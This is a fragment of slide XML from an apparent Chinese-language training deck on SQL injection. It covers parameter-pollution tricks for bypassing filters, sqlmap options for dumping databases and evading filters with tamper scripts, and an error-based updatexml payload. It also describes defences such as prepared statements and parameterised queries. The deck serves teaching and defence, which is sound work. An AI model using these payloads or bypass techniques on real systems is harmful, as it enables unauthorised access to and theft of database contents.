                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过滤程序只取其中一个参数值，后面的参数消失，闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，倒是绕过匹配规则，适用于整句匹配的情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>show_user.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=5;select+1&amp;id=2&amp;id=3+from+users+where+id=1--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>index.php?par1=val1&amp;par1=val2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>| ASP.NET/IIS | val1,val2 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>| ASP/IIS | val1,val2 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>| PHP/Apache | val2 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>| JSP/Tomcat | val1 |</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238672" y="2249488"/>
            <a:ext cx="12673408"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【SQLMAP】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3150" dirty="0"/>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65027" y="3295928"/>
            <a:ext cx="11592270" cy="3390900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318792" y="3312352"/>
            <a:ext cx="15193688" cy="9387185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要测试的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--dbs:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--tables:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--columns:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-D:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-T:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-C:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-dump:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>形式传参</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-dbms:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--level:(1-5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定测试等级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--risk:(1-5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定测试风险等级</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--tamper:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tamper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，通常用于绕过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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792" y="4029560"/>
            <a:ext cx="15193688" cy="347787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、严格过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、预编译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、参数化查询</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7317987"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常用框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466131" y="2316480"/>
            <a:ext cx="20697517" cy="350174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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mybatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>框架下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>Mybatis-plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0"/>
              <a:t>框架下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>框架下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</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81386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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408264" y="1935480"/>
            <a:ext cx="20697517"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 JDBC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在两种方法执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，分别为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，相比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句进行预编译，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会直接拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.Statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>示例代码中直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>statement.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sql</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4783772" y="6299000"/>
            <a:ext cx="11919268" cy="6225117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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1466131" y="2316480"/>
            <a:ext cx="22369229" cy="936107"/>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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 此处存在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注入漏洞，执行</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语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>select * from users where id = '1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(1,concat(0x7e,(SELECT user()),0x7e),1)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3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="3747960"/>
            <a:ext cx="20009018" cy="2408284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466131" y="6858000"/>
            <a:ext cx="20009019" cy="3769360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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12762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xxx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466131" y="2316480"/>
            <a:ext cx="20697517" cy="5247544"/>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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>2.PreparedStatement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>PrepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>防御预编译的写法是使用</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作为占位符然后将</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语句进行预编译，由于</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作为占位符已经告诉数据库整个</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语句的结构，即</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处传入的是参数，而不会是</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语句，所以即使攻击者传入</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语句也不会被数据库解析。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>但是，需要注意的是，</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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4194785" y="7209694"/>
            <a:ext cx="17968863" cy="5247544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
